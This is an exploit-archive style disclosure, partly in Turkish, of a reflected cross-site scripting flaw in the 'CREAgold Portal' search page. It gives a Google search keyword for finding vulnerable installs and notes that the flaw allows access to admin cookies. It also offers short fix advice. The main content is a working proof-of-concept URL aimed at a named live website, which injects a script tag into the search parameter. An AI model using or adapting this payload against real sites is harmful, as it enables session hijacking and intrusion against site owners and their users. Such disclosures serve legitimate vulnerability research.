< ------------------- header data start ------------------- >

#############################################################

# Application Name : CREAgold Portal

# Vulnerable Type : XSS

# Google Keyword : CREAgold

# Infection : XSS ile admin cookilerine erisim saglanabilir.

# Bug Fix Advice : Arama sayfasinda yapilan sorgularin belirli karakterlerin disina çikamamasi Için ’,+,% gibi kodlarin scriptte yasaklanmasi ayrica html kodlarininda scriptte engellenmesi gerekmektedir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

Url/Directory http://www.biztrabzonluyuz.com/default.asp?sayfa=arama1&aranan=><script>alert(1)</script>%20&tur1=&pn=

< -- bug code end of -- >